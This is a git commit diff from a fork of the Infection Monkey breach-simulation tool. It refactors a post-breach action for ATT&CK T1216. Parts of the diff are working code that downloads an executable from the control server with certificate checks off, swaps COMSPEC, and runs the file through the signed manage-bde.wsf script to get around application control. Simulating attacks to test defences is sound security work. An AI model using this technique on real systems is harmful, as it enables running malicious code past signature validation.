p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity

CR changes

This commit is contained in:
Shreya 2020-08-24 18:14:10 +05:30
parent 984a8c2251
commit 989286857b
6 changed files with 33 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
monkey/common/data/api_url_consts.py Normal file
View File

@ -0,0 +1 @@
T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download'

5
monkey/infection_monkey/control.py
View File

@ -2,12 +2,14 @@ import json
import logging
import platform
from socket import gethostname
from urllib.parse import urljoin
import requests
from requests.exceptions import ConnectionError
import infection_monkey.monkeyfs as monkeyfs
import infection_monkey.tunnel as tunnel
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
from infection_monkey.config import GUID, WormConfiguration
from infection_monkey.network.info import check_internet_access, local_ips
from infection_monkey.transport.http import HTTPConnectProxy
@ -328,7 +330,8 @@ class ControlClient(object):
@staticmethod
def get_T1216_pba_file():
try:
return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123
return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123
T1216_PBA_FILE_DOWNLOAD_PATH),
verify=False,
proxies=ControlClient.proxies,
stream=True)

20
monkey/infection_monkey/post_breach/actions/use_signed_scripts.py
View File

@ -1,3 +1,4 @@
import logging
import subprocess
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
@ -6,6 +7,8 @@ from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
from infection_monkey.utils.environment import is_windows_os
LOG = logging.getLogger(__name__)
class SignedScriptProxyExecution(PBA):
def __init__(self):
@ -14,11 +17,14 @@ class SignedScriptProxyExecution(PBA):
windows_cmd=' '.join(windows_cmds))
def run(self):
original_comspec = ''
if is_windows_os():
original_comspec =\
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
try:
original_comspec = ''
if is_windows_os():
original_comspec =\
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
super().run()
cleanup_changes(original_comspec)
super().run()
except Exception as e:
LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}")
finally:
cleanup_changes(original_comspec)

9
monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
View File

@ -1,5 +1,4 @@
import os
import subprocess
from infection_monkey.control import ControlClient
@ -8,11 +7,11 @@ TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe')
def get_windows_commands_to_proxy_execution_using_signed_script():
download = ControlClient.get_T1216_pba_file()
with open(TEMP_COMSPEC, 'wb') as file_obj:
file_obj.write(download.content)
file_obj.flush()
with open(TEMP_COMSPEC, 'wb') as random_exe_obj:
random_exe_obj.write(download.content)
random_exe_obj.flush()
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
windir_path = os.environ['WINDIR']
signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf')
return [

3
monkey/monkey_island/cc/app.py
View File

@ -6,6 +6,7 @@ from flask import Flask, Response, send_from_directory
from werkzeug.exceptions import NotFound
import monkey_island.cc.environment.environment_singleton as env_singleton
from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
from monkey_island.cc.database import database, mongo
from monkey_island.cc.resources.attack.attack_config import AttackConfiguration
@ -132,7 +133,7 @@ def init_api_resources(api):
api.add_resource(Log, '/api/log', '/api/log/')
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH)
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
'/api/fileUpload/<string:file_type>?load=<string:filename>',
'/api/fileUpload/<string:file_type>?restore=<string:filename>')

12
monkey/monkey_island/cc/services/attack/technique_reports/T1216.py
View File

@ -8,8 +8,14 @@ __author__ = "shreyamalviya"
class T1216(PostBreachTechnique):
tech_id = "T1216"
unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
"pre-existing signed script since it didn't run on any Windows machines."
"pre-existing signed script since it didn't run on any Windows machines. " +\
"If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
"bypass application control and signature validation on systems."
scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
"pre-existing signed script on Windows but failed."
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
"pre-existing signed script on Windows but failed. " +\
"If successful, this behavior could be abused by adversaries to execute malicious files that could " +\
"bypass application control and signature validation on systems."
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\
"This behavior could be abused by adversaries to execute malicious files that could " +\
"bypass application control and signature validation on systems."
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]